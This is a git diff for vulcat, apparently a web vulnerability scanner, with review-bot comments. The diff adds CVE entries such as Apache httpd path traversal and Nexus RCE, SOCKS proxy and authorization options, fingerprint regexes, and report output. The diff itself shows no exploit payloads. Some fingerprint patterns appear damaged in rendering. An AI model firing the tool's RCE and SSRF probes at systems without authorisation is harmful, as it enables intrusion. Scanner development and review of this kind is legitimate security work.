The current web vulnerabilities that support scanning: [Click on]
@@ -26,6 +26,10 @@
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager unAuthorized |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF |
+| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 Directory traversal |
+| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 Directory traversal |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/FileRead |
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Apache Struts2 | S2-001 | RCE | Struts2 Remote code execution |
@@ -77,14 +81,30 @@
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x Directory traversal |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Influxdb | None | unAuth | influxdb unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Jenkins | CVE-2018-1000861 | RCE | jenkins Remote code execution |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Jetty | CVE-2021-28164 | DSinfo | jetty Disclosure information |
+| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet Disclosure information|
+| Jetty | CVE-2021-34429 | DSinfo | jetty Disclosure information |
++----------------------+--------------------+--------------+------------------------------------------------------------+
+| Jupyter | None | unAuth | Jupyter unAuthorized |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Keycloak | CVE-2020-10770 | SSRF | request_uri SSRF |
+----------------------+--------------------+--------------+------------------------------------------------------------+
| Landray | CNVD-2021-28277 | FileRead/SSRF| Landray-OA FileRead/SSRF |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd FileRead |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| mongo-express | CVE-2019-10758 | RCE | Remote code execution |
+----------------------+--------------------+--------------+------------------------------------------------------------+
+| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum Remote code execution |
+| Nexus Repository | CVE-2019-7238 | RCE | 3.x Remote code execution |
+| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475 Bypass |
+| Nexus Repository | CVE-2020-10199 | RCE | 3.x Remote code execution |
+| Nexus Repository | CVE-2020-10204 | RCE | 3.x Remote code execution |
++----------------------+--------------------+--------------+------------------------------------------------------------+
| Nodejs | CVE-2017-14849 | FileRead | Node.js Directory traversal |
| Nodejs | CVE-2021-21315 | RCE | Node.js Remote code execution |
+----------------------+--------------------+--------------+------------------------------------------------------------+
@@ -179,11 +199,15 @@ Options:
The number of threads (default: 2)
--delay=DELAY Delay time/s (default: 1)
--timeout=TIMEOUT Timeout/s (default: 10)
- --http-proxy=HTTP_PROXY
- The HTTP/HTTPS proxy (e.g. --http-proxy
- 127.0.0.1:8080)
--user-agent=UA Customize the User-Agent
- --cookie=COOKIE Add a cookie
+ --cookie=COOKIE Add a cookie (e.g. --cookie "PHPSESSID=123456789")
+ --auth=AUTHORIZATION
+ Add a Authorization (e.g. --auth "Basic
+ YWRtaW46YWRtaW4=")
+
+ Log:
+ Debug information
+
--log=LOG The log level, Optional 1-6 (default: 1) [level 2:
Framework name + Vulnerability number + status code]
[level 3: Level 2 content + request method + request
@@ -191,6 +215,18 @@ Options:
packet] [Level 5: Level 4 content + response header]
[level 6: Level 5 content + response content]
+ Proxy:
+ Proxy server
+
+ --http-proxy=HTTP_PROXY
+ The HTTP/HTTPS proxy (e.g. --http-proxy
+ 127.0.0.1:8080)
+ --socks4-proxy=SOCKS4_PROXY
+ The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080)
+ --socks5-proxy=SOCKS5_PROXY
+ The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or
+ admin:123456@127.0.0.1:8080)
+
Application:
Specify the target type for the scan
@@ -241,10 +277,10 @@ Options:
--list View all payload
Supported target types(Case insensitive):
- AliDruid,nacos,airflow,apisix,flink,solr,struts2,tomcat,appweb,conflue
- nce,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,jenkins,
- keycloak,mongoexpress,nodejs,nodered,showdoc,spring,thinkphp,ueditor,w
- eblogic,webmin,yonyou
+ AliDruid,nacos,airflow,apisix,flink,hadoop,solr,struts2,tomcat,appweb,
+ confluence,cisco,discuz,django,drupal,elasticsearch,f5bigip,fastjson,g
+ itea,gitlab,grafana,jenkins,keycloak,landray,mongoexpress,nodejs,noder
+ ed,rails,showdoc,spring,thinkphp,ueditor,weblogic,webmin,yonyou
```
## language
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 7aec2f7..e675cd5 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -16,6 +16,8 @@
from payloads.ApacheAirflow import airflow
from payloads.ApacheAPISIX import apisix
from payloads.ApacheFlink import flink
+from payloads.ApacheHadoop import hadoop
+from payloads.ApacheHttpd import httpd
from payloads.ApacheSolr import solr
from payloads.ApacheTomcat import tomcat
from payloads.ApacheStruts2 import struts2
@@ -31,12 +33,16 @@
from payloads.Gitea import gitea
from payloads.Gitlab import gitlab
from payloads.Grafana import grafana
-from payloads.ApacheHadoop import hadoop
+from payloads.Influxdb import influxdb
from payloads.Jenkins import jenkins
+from payloads.Jetty import jetty
+from payloads.Jupyter import jupyter
from payloads.Keycloak import keycloak
# from payloads.Kindeditor import kindeditor
from payloads.Landray import landray
+from payloads.MiniHttpd import minihttpd
from payloads.MongoExpress import mongoexpress
+from payloads.Nexus import nexus
from payloads.Nodejs import nodejs
from payloads.NodeRED import nodered
from payloads.RubyOnRails import rails
@@ -79,49 +85,53 @@ def start(self):
if (('http://' not in u[0:10]) and ('https://' not in u[0:10])):
logger.info('red_ex', self.lang['core']['start']['url_error'].format(u))
continue
-
- logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
- # * --------------------WAF指纹识别--------------------
- if (not self.no_waf):
- waf_info = waf.identify(u) # * WAF指纹识别
- if waf_info:
- while True:
- if (not self.batch): # * 是否使用默认选项
- logger.info('red', '', print_end='')
- operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数
- else:
- logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='')
- operation = 'no' # * 默认选项No
- logger.info('red', 'no', notime=True)
-
- operation = operation.lower() # * 字母转小写
- if operation in ['y', 'yes']: # * 继续扫描
- logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
- break
- elif operation in ['n', 'no']:
- logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
- u = 'next'
- break
- else:
- logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find'])
+ logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
- if u == 'next':
+ if check.check_connect(u):
+ # * --------------------WAF指纹识别--------------------
+ if (not self.no_waf):
+ waf_info = waf.identify(u) # * WAF指纹识别
+ if waf_info:
+ while True:
+ if (not self.batch): # * 是否使用默认选项
+ logger.info('red', '', print_end='')
+ operation = input(self.lang['core']['waf_finger']['waf_find'].format(waf_info)) # * 接收参数
+ else:
+ logger.info('red', self.lang['core']['waf_finger']['waf_find'].format(waf_info), print_end='')
+ operation = 'no' # * 默认选项No
+ logger.info('red', 'no', notime=True)
+
+ operation = operation.lower() # * 字母转小写
+ if operation in ['y', 'yes']: # * 继续扫描
+ logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描
+ break
+ elif operation in ['n', 'no']:
+ logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 下一个
+ u = 'next'
+ break
+ else:
+ logger.info('yellow_ex', self.lang['core']['waf_finger']['waf_not_find'])
+
+ if u == 'next':
+ continue
+ # * --------------------WAF指纹识别--------------------
+
+ # * --------------------框架指纹识别--------------------
+ if ((self.application == 'auto') and (not self.vuln)):
+ logger.info('yellow_ex', self.lang['core']['web_finger']['web'])
+ webapp.stop = self.stop
+ new_app_list = webapp.identify(u)
+ if new_app_list:
+ logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list)))
+ self.app_list = new_app_list
+ else:
+ logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find'])
+
+ # * --------------------框架指纹识别--------------------
+ else:
+ logger.info('red', self.lang['core']['start']['unable'] + u) # ? 提示, 无法访问当前url
continue
- # * --------------------WAF指纹识别--------------------
-
- # * --------------------框架指纹识别--------------------
- if ((self.application == 'auto') and (not self.vuln)):
- logger.info('yellow_ex', self.lang['core']['web_finger']['web'])
- webapp.stop = self.stop
- new_app_list = webapp.identify(u)
- if new_app_list:
- logger.info('yellow_ex', self.lang['core']['web_finger']['web_find'].format(str(new_app_list)))
- self.app_list = new_app_list
- else:
- logger.info('yellow_ex', self.lang['core']['web_finger']['web_not_find'])
-
- # * --------------------框架指纹识别--------------------
if self.no_poc:
logger.info('red', self.lang['core']['start']['no_poc'])
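Review bot: The fingerprint result is stored on the instance (`self.app_list = new_app_list`), so when a later URL in the same run matches nothing, the `web_not_find` branch leaves the previous target's list in place and that target's payloads are fired at the new URL; this looks pre-existing, and the re-indentation under `check.check_connect(u)` keeps it. Save the full list once (e.g. `self.all_apps = list(self.app_list)` in `__init__`, which is outside this view) and reset `self.app_list = self.all_apps` before each `webapp.identify(u)` call, or pass a per-URL local down instead of mutating the instance. Also note that `check_connect` returns False on any exception (see the check.py hunk in this commit), so a live target that merely exceeds `--timeout` is reported with the same `unable` message as a refused one; a distinct log line for the timeout case would save triage time. `start` continues past the end of this hunk.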
diff --git a/lib/initial/config.py b/lib/initial/config.py
index aec9184..e0d9023 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -9,6 +9,8 @@
from thirdparty.requests import packages
import re
import http.client
+import socket
+import socks
global config
@@ -69,13 +71,36 @@ def __init__(self, args):
'Accept': '*/*',
'Connection': 'close'
}
+
if args.cookie:
args.headers['Cookie'] = args.cookie.lstrip('Cookie: ')
- args.proxies = {
- 'http': args.http_proxy,
- 'https': args.http_proxy
- }
+ if args.authorization:
+ args.headers['Authorization'] = args.authorization.lstrip('Authorization: ')
+
+ if args.http_proxy: # * requests代理
+ args.proxies = {
+ 'http': 'http://' + args.http_proxy,
+ 'https': 'http://' + args.http_proxy
+ }
+ args.proxy = tuple(args.http_proxy.split(':')) # * HackRequests代理
+ else:
+ args.proxies = {}
+ args.proxy = ()
+
+ if args.socks5_proxy: # * socks 5
+ if ('@' in args.socks5_proxy): # * 有无身份验证
+ proxy_5 = args.socks5_proxy.replace('@', ':').split(':')
+ socks.set_default_proxy(socks.SOCKS5, proxy_5[2], int(proxy_5[3]), username=proxy_5[0], password=proxy_5[1])
+ else:
+ proxy_5 = args.socks5_proxy.split(':')
+ socks.set_default_proxy(socks.SOCKS5, proxy_5[0], int(proxy_5[1]))
+ socket.socket = socks.socksocket
+
+ elif args.socks4_proxy: # * socks 4
+ proxy_4 = args.socks4_proxy.split(':')
+ socks.set_default_proxy(socks.SOCKS4, proxy_4[0], int(proxy_4[1]))
+ socket.socket = socks.socksocket
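Review bot: `args.authorization.lstrip('Authorization: ')` strips a character set, not a prefix, so any header value starting with characters from {A,u,t,h,o,r,i,z,a,n,:,space} is silently mangled (`--auth "token abc"` becomes `ken abc`), and the existing `Cookie` line just above has the same defect. Use a real prefix check: `if args.authorization.lower().startswith('authorization:'): args.authorization = args.authorization.split(':', 1)[1].strip()`. The SOCKS5 credential parse `replace('@', ':').split(':')` breaks on a password containing `:` or `@` and raises IndexError/ValueError on a malformed value; `creds, _, hostport = args.socks5_proxy.rpartition('@')`, then `username, _, password = creds.partition(':')` and `host, _, port = hostport.rpartition(':')`, is robust and also covers the socks4 form when `creds` is empty. Separately, `socket.socket = socks.socksocket` is a process-wide patch and none of the three proxy options are mutually exclusive, so `--http-proxy` together with `--socks5-proxy` chains the HTTP proxy through the SOCKS socket; either reject the combination here or state the chaining in the help text.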
if args.vuln:
args.vuln = args.vuln.lower()
@@ -87,15 +112,14 @@ def __init__(self, args):
'discuz', 'django', 'drupal',
'elasticsearch',
'f5bigip', 'fastjson', 'flink',
- # 'gitea', 'gitlab', 'grafana',
- 'gitea', 'gitlab',
- 'hadoop',
- 'jenkins',
- # 'keycloak', 'kindeditor',
- 'keycloak',
+ 'gitea', 'gitlab', # 'grafana',
+ 'influxdb',
+ 'hadoop', 'httpd',
+ 'jenkins', 'jetty', 'jupyter',
+ 'keycloak', # 'kindeditor',
'landray',
- 'mongoexpress',
- 'nacos', 'nodejs', 'nodered',
+ 'minihttpd', 'mongoexpress',
+ 'nexus', 'nacos', 'nodejs', 'nodered',
'rails',
'showdoc', 'solr', 'struts2', 'spring',
'thinkphp', 'tomcat',
diff --git a/lib/initial/language.py b/lib/initial/language.py
index d21eefb..fd389b9 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -26,11 +26,23 @@ def language():
'thread': 'The number of threads (default: 2)',
'delay': 'Delay time/s (default: 1)',
'timeout': 'Timeout/s (default: 10)',
- 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)',
'user_agent': 'Customize the User-Agent',
- 'cookie': 'Add a cookie',
+ 'cookie': 'Add a cookie (e.g. --cookie "PHPSESSID=123456789")',
+ 'Authorization': 'Add a Authorization (e.g. --auth "Basic YWRtaW46YWRtaW4=")',
+ },
+ 'log_help': {
+ 'title': 'Log',
+ 'name': 'Debug information',
'log': 'The log level, Optional 1-6 (default: 1) [level 2: Framework name + Vulnerability number + status code] [level 3: Level 2 content + request method + request target +POST data] [level 4: Level 2 content + request packet] [Level 5: Level 4 content + response header] [level 6: Level 5 content + response content]'
},
+ 'proxy_help': {
+ 'title': 'Proxy',
+ 'name': 'Proxy server',
+ 'http_proxy': 'The HTTP/HTTPS proxy (e.g. --http-proxy 127.0.0.1:8080)',
+ 'socks4_proxy': 'The socks4 proxy(e.g. --socks4-proxy 127.0.0.1:8080)',
+ 'socks5_proxy': 'The socks5 proxy(e.g. --socks5-proxy 127.0.0.1:8080 or admin:123456@127.0.0.1:8080)',
+
+ },
'application_help': {
'title': 'Application',
'name': 'Specify the target type for the scan',
@@ -141,11 +153,22 @@ def language():
'thread': '线程数 (默认: 2)',
'delay': '延迟时间/秒 (默认: 1)',
'timeout': '超时时间/秒 (默认: 10)',
- 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)',
'user_agent': '自定义User-Agent',
- 'cookie': '添加cookie',
+ 'cookie': '添加cookie (如: --cookie "PHPSESSID=123456789")',
+ 'Authorization': '添加Authorization (如: --auth "Basic YWRtaW46YWRtaW4=")'
+ },
+ 'log_help': {
+ 'title': '日志',
+ 'name': '运行时输出的debug信息',
'log': '日志等级, 可选1-6 (默认: 1) [日志2级: 框架名称+漏洞编号+状态码] [日志3级: 2级内容+请求方法+请求目标+POST数据] [日志4级: 2级内容+请求数据包] [日志5级: 4级内容+响应头] [日志6级: 5级内容+响应内容]'
},
+ 'proxy_help': {
+ 'title': 'Proxy',
+ 'name': '代理',
+ 'http_proxy': 'http/https代理 (如: --http-proxy 127.0.0.1:8080)',
+ 'socks4_proxy': 'socks4代理(如: --socks4-proxy 127.0.0.1:8080)',
+ 'socks5_proxy': 'socks5代理(如: --socks5-proxy 127.0.0.1:8080 或 admin:123456@127.0.0.1:8080)',
+ },
'application_help': {
'title': 'Application',
'name': '指定扫描的目标类型',
diff --git a/lib/initial/list.py b/lib/initial/list.py
index 9311be5..db6ccbc 100644
--- a/lib/initial/list.py
+++ b/lib/initial/list.py
@@ -74,6 +74,23 @@ def list():
'description': 'Hadoop YARN ResourceManager 未授权访问'
}
],
+ 'Apache Httpd': [
+ {
+ 'vul_id': 'CVE-2021-40438',
+ 'type': 'SSRF',
+ 'description': 'Apache HTTP Server 2.4.48 mod_proxy SSRF '
+ },
+ {
+ 'vul_id': 'CVE-2021-41773',
+ 'type': 'FileRead/RCE',
+ 'description': 'Apache HTTP Server 2.4.49 路径遍历'
+ },
+ {
+ 'vul_id': 'CVE-2021-42013',
+ 'type': 'FileRead/RCE',
+ 'description': 'Apache HTTP Server 2.4.50 路径遍历'
+ }
+ ],
'Apache Solr': [
{
'vul_id': 'CVE-2021-27905',
@@ -284,6 +301,13 @@ def list():
'description': 'Grafana 8.x 插件模块路径遍历'
},
],
+ 'Influxdb': [
+ {
+ 'vul_id': 'None',
+ 'type': 'unAuth',
+ 'description': 'influxdb 未授权访问'
+ },
+ ],
'Jenkins': [
{
'vul_id': 'CVE-2018-1000861',
@@ -291,6 +315,30 @@ def list():
'description': 'jenkins 远程命令执行'
}
],
+ 'Jetty': [
+ {
+ 'vul_id': 'CVE-2021-28164',
+ 'type': 'DSinfo',
+ 'description': 'jetty 模糊路径信息泄露'
+ },
+ {
+ 'vul_id': 'CVE-2021-28169',
+ 'type': 'DSinfo',
+ 'description': 'jetty Utility Servlets ConcatServlet 双重解码信息泄露'
+ },
+ {
+ 'vul_id': 'CVE-2021-34429',
+ 'type': 'DSinfo',
+ 'description': 'jetty 模糊路径信息泄露'
+ }
+ ],
+ 'Jupyter': [
+ {
+ 'vul_id': 'None',
+ 'type': 'unAuth',
+ 'description': 'Jupyter 未授权访问'
+ }
+ ],
'Keycloak': [
{
'vul_id': 'CVE-2020-10770',
@@ -313,6 +361,13 @@ def list():
'description': '蓝凌OA 任意文件读取/SSRF'
}
],
+ 'Mini Httpd': [
+ {
+ 'vul_id': 'CVE-2018-18778',
+ 'type': 'FileRead',
+ 'description': 'mini_httpd 任意文件读取'
+ }
+ ],
'mongo-express': [
{
'vul_id': 'CVE-2019-10758',
@@ -320,6 +375,33 @@ def list():
'description': '未授权远程代码执行'
}
],
+ 'Nexus Repository': [
+ {
+ 'vul_id': 'CVE-2019-5475',
+ 'type': 'RCE',
+ 'description': '2.x yum插件 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2019-7238',
+ 'type': 'RCE',
+ 'description': '3.x 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2019-15588',
+ 'type': 'RCE',
+ 'description': '2019-5475的绕过'
+ },
+ {
+ 'vul_id': 'CVE-2020-10199',
+ 'type': 'RCE',
+ 'description': '3.x 远程命令执行'
+ },
+ {
+ 'vul_id': 'CVE-2020-10204',
+ 'type': 'RCE',
+ 'description': '3.x 远程命令执行'
+ }
+ ],
'Nodejs': [
{
'vul_id': 'CVE-2017-14849',
diff --git a/lib/initial/parse.py b/lib/initial/parse.py
index 6e4a82f..7321c83 100644
--- a/lib/initial/parse.py
+++ b/lib/initial/parse.py
@@ -19,7 +19,7 @@ def parse():
python3 vulcat.py -u https://www.example.com/ -a tomcat -v CVE-2017-12615
python3 vulcat.py -f url.txt -t 10
python3 vulcat.py --list
-''', version='vulcat.py-1.1.2\n')
+''', version='vulcat.py-1.1.3\n')
# * 指定目标
target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name'])
target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url'])
@@ -31,16 +31,25 @@ def parse():
optional.add_option('-t', '--thread', type='int', dest='thread', default=2, help=lang['optional_help']['thread'])
optional.add_option('--delay', type='float', dest='delay', default=1, help=lang['optional_help']['delay'])
optional.add_option('--timeout', type='int', dest='timeout', default=10, help=lang['optional_help']['timeout'])
- optional.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['optional_help']['http_proxy'])
optional.add_option('--user-agent', type='string', dest='ua', default='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0', help=lang['optional_help']['user_agent'])
optional.add_option('--cookie', type='string', dest='cookie', default=None, help=lang['optional_help']['cookie'])
- optional.add_option('--log', type='int', dest='log', default=1, help=lang['optional_help']['log'])
+ optional.add_option('--auth', type='string', dest='authorization', default=None, help=lang['optional_help']['Authorization'])
+ # optional.add_option('--random-ua', dest='random_ua', action='store_true', help='')
+
+ # * 日志参数
+ log = parser.add_option_group(lang['log_help']['title'], lang['log_help']['name'])
+ log.add_option('--log', type='int', dest='log', default=1, help=lang['log_help']['log'])
+
+ # * 代理
+ proxy = parser.add_option_group(lang['proxy_help']['title'], lang['proxy_help']['name'])
+ proxy.add_option('--http-proxy', type='string', dest='http_proxy', default=None, help=lang['proxy_help']['http_proxy'])
+ proxy.add_option('--socks4-proxy', type='string', dest='socks4_proxy', default=None, help=lang['proxy_help']['socks4_proxy'])
+ proxy.add_option('--socks5-proxy', type='string', dest='socks5_proxy', default=None, help=lang['proxy_help']['socks5_proxy'])
# * 指定目标类型
application = parser.add_option_group(lang['application_help']['title'], lang['application_help']['name'])
application.add_option('-a', '--application', type='string', dest='application', default='auto', help=lang['application_help']['application'])
application.add_option('-v', '--vuln', type='string', dest='vuln', default=None, help=lang['application_help']['vuln'])
- # application.add_option('-c', '--command', type='string', dest='command', default=None, help='配合exp执行自定义命令')
# * 第三方api, 例如dnslog/ceye
api = parser.add_option_group(lang['api_help']['title'], lang['api_help']['name'])
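Review bot: `--auth` takes the raw Authorization value on the command line, so a Basic or Bearer credential lands in shell history and in `ps` output for every user on the host; the help text (defined in language.py) should carry that caveat, and accepting the value from an environment variable or file would let cautious users avoid it. The three proxy options added here are independent at the parser level, and config.py in this same commit applies `--http-proxy` and a SOCKS patch simultaneously if both are given; a check after `parse_args()` (outside this hunk), e.g. `if args.socks4_proxy and args.socks5_proxy: parser.error('--socks4-proxy and --socks5-proxy are mutually exclusive')`, would make the behaviour explicit.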
@@ -50,6 +59,7 @@ def parse():
save = parser.add_option_group(lang['save_help']['title'], lang['save_help']['name'])
save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text'])
save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json'])
+ # save.add_option('--output-html', type='string', dest='html_filename', default=None, help='')
# * 通用参数
general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name'])
diff --git a/lib/plugins/Exp.py b/lib/plugins/Exp.py
deleted file mode 100644
index 67d4600..0000000
--- a/lib/plugins/Exp.py
+++ /dev/null
@@ -1,21 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
- 插件:
- POC转EXP
-'''
-
-from lib.api.dns import dns
-from lib.initial.config import config
-from lib.tool.md5 import md5, random_md5
-from lib.tool.logger import logger
-from lib.tool.thread import thread
-from lib.tool import check
-from lib.tool import head
-from thirdparty import requests
-from time import sleep
-import re
-
-def exp(result):
- pass
\ No newline at end of file
diff --git a/lib/plugins/fingerprint/webapp.py b/lib/plugins/fingerprint/webapp.py
index 346e528..5ccf14c 100644
--- a/lib/plugins/fingerprint/webapp.py
+++ b/lib/plugins/fingerprint/webapp.py
@@ -159,6 +159,24 @@ def __init__(self):
r'Apache Flink Web Dashboard'
]
},
+ {
+ 'name': 'httpd',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'The requested URL was not found on this server\.',
+ r'You don\'t have permission to access this resource\.',
+ r'The server is temporarily unable to service your request due to maintenance downtime or capacity problems\. Please try again later\.',
+ r'Apache Tomcat/.*',
+ r'Home',
+ r'Copyright.*\d{0,4}-\d{0,4} Apache Software Foundation\. All Rights Reserved
',
+ r'These icons were originally made for Mosaic for X.*If you\'d like to contribute additions to this set.*http://httpd\.apache\.org/docs-project',
+ r'Apache2 Debian Default Page: It works.*Apache2 Debian Default Page',
+ r'Apache2 server after installation on Debian systems.*it means that the Apache HTTP server installed',
+ r'The configuration layout for an Apache2 web server installation on Debian systems is as follows:',
+ r'Apache2 package with Debian\. However, check.*existing bug reports'
+ ]
+ },
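Review bot: The new `httpd` fingerprint list contains `r'Home'`, which matches nearly any HTML page, plus `r'Apache Tomcat/.*'` and the ASF copyright line, so in `auto` mode almost every target will be tagged httpd (and every Tomcat target double-tagged) and receive the httpd payloads; the CVE-2021-40438 probe in particular makes the target connect to a caller-chosen URL and should not fire on misidentified hosts. Drop `r'Home'` and the Tomcat pattern and keep only httpd-specific strings (the Debian default page, the icons README, the `docs-project` link), adding a `Server: Apache/2\.` check if the matcher also sees headers — hedged, as the matcher itself is outside this hunk. The copyright pattern is rendered across two lines here, which is not valid inside a single-quoted raw string, so some characters (likely an HTML tag) were lost in rendering; verify these regexes against the source file before relying on them.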
{
'name': 'solr',
'path': '',
@@ -188,7 +206,9 @@ def __init__(self):
'path': '',
'data': '',
'fingerprint': [
- r'Apache Tomcat/.*'
+ r'Apache Tomcat/.*',
+ r'Home',
+ r'Copyright.*\d{0,4}-\d{0,4} Apache Software Foundation\. All Rights Reserved
'
]
},
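Review bot: Adding `r'Home'` to the Tomcat fingerprint makes it match practically any page, so Tomcat payloads will run against targets that are not Tomcat; `r'Apache Tomcat/.*'` and the copyright line already identify the default page, so `r'Home'` should be removed. As with the httpd hunk, the copyright pattern is shown split across two lines, which suggests an HTML tag was lost in rendering — confirm the literal in the source file.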
{
@@ -364,6 +384,24 @@ def __init__(self):
r'Welcome to Jenkins!
'
]
},
+ {
+ 'name': 'jetty',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'
Powered by Jetty:// .{0,30}
'
+ ]
+ },
+ {
+ 'name': 'jupyter',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'Jupyter Notebook requires JavaScript',
+ r"",
+ r'Currently running Jupyter processes'
+ ]
+ },
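Review bot: As rendered here, the second `jupyter` pattern is the empty string `r""`, and `re.search` with an empty pattern matches every response, so every target would be fingerprinted as Jupyter and receive the unauthorized-access probe. If the original literal was an HTML tag (e.g. a `<title>` element) that the page rendering stripped, this is only an extraction artifact, but it is worth confirming in the source file and replacing with a distinctive text fragment such as `r'Jupyter Notebook requires JavaScript'` alone. The `jetty` pattern likewise shows literal line breaks inside a single-quoted raw string, which is not valid Python, so characters were dropped there as well.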
# {
# 'name': 'keycloak',
# 'path': '',
@@ -389,6 +427,14 @@ def __init__(self):
r"'lui': 'sys/ui/js'"
]
},
+ {
+ 'name': 'minihttpd',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'mini_httpd/.{0,40}'
+ ]
+ },
{
'name': 'mongoexpress',
'path': '',
@@ -400,6 +446,21 @@ def __init__(self):
r'Mongo Express
'
]
},
+ {
+ 'name': 'nexus',
+ 'path': '',
+ 'data': '',
+ 'fingerprint': [
+ r'Nexus Repository Manager',
+ r'Sonatype Nexus',
+ r'',
+ r'',
+ r'',
+ r'You are using a version of Internet Explorer that is not supported\.
See the '
+ ]
+ },
{
'name': 'nodejs',
'path': '/404',
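Review bot: Three of the `nexus` fingerprint entries are rendered as the empty string `r''`, and an empty regex matches every response, so if this is what the file actually contains every target will be tagged Nexus and hit with five RCE probes; if HTML tags were stripped in rendering, the patterns should be confirmed against the source file and, where they were bare tags, replaced with text that is specific to Nexus (`Nexus Repository Manager` and `Sonatype Nexus` already are). Empty or tag-only patterns are cheap to guard against in the matcher with `if not pattern: continue` — that matcher is outside this hunk.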
diff --git a/lib/report/output.py b/lib/report/output.py
index 561d7e3..d5016b0 100644
--- a/lib/report/output.py
+++ b/lib/report/output.py
@@ -6,6 +6,7 @@
from lib.tool.timed import nowtime_year
from lib.tool.logger import logger
from thirdparty import requests
+from thirdparty import HackRequests
# from lib.plugins.Exp import exp
import json
import http.client
@@ -83,6 +84,8 @@ def output_json(results, filename, lang):
for key in result_info.keys():
if type(result_info[key]) == requests.models.Response:
result_info[key] = output_res(key, result_info[key], iscolor=False)
+ elif type(result_info[key]) == HackRequests.response:
+ result_info[key] = output_Hackres(key, result_info[key], iscolor=False)
results_info_list.append(json.dumps(result_info, indent=4) + '\n')
results_info_list = set(results_info_list)
@@ -127,6 +130,9 @@ def output_vul_info_color(result):
elif value_type == requests.models.Response: # * Response输出方式
result_info += output_res(key, value)
+ elif value_type == HackRequests.response:
+ result_info += output_Hackres(key, value) # * HackResponse输出方式
+
return result_info
def output_vul_info(result):
@@ -146,6 +152,9 @@ def output_vul_info(result):
elif value_type == requests.models.Response:
result_info += output_res(key, value, iscolor=False)
+ elif value_type == HackRequests.response:
+ result_info += output_Hackres(key, value, iscolor=False)
+
return result_info
def output_str(key, value, iscolor=True):
@@ -247,4 +256,30 @@ def output_res(key, res, iscolor=True):
except:
return info_res
+ return info_res
+
+def output_Hackres(key, res, iscolor=True):
+ ''' 接收一个HackRequests结果, 返回一个http数据包 '''
+ info_res = ''
+
+ if iscolor:
+ try:
+ info_res += color.yellow_ex(key) + ':'
+ info_res += color.red_ex(' [Request')
+ info_res += color.black_ex('\n' + res.log.get('request'))
+
+ info_res += color.red_ex(']')
+ info_res += color.reset('\n ')
+ except:
+ return info_res
+ else:
+ try:
+ info_res += key + ':'
+ info_res += ' [Request'
+ info_res += '\n' + res.log.get('request').replace('\n', '')
+
+ info_res += ']\n '
+ except:
+ return info_res
+
return info_res
\ No newline at end of file
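Review bot: `output_Hackres` writes the raw request into the text/JSON report, and that request carries whatever `--cookie`/`--auth` value the user supplied, so output files now contain live credentials; add that caveat to the docstring and consider redacting `Cookie:` and `Authorization:` header lines before writing (the same applies to the existing `output_res` path). The non-colour branch does `.replace('\n', '')`, collapsing request line, headers and body into a single line, which differs from the colour branch and makes the JSON record unreadable; `json.dumps` already escapes newlines, so leaving them intact is the simpler choice. `res.log.get('request')` can return `None`, in which case `'\n' + None` raises TypeError that the bare `except:` turns into a silently truncated record; use `res.log.get('request', '')` and narrow the handler to `except (AttributeError, TypeError):`.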
diff --git a/lib/tool/check.py b/lib/tool/check.py
index ea658d2..a914319 100644
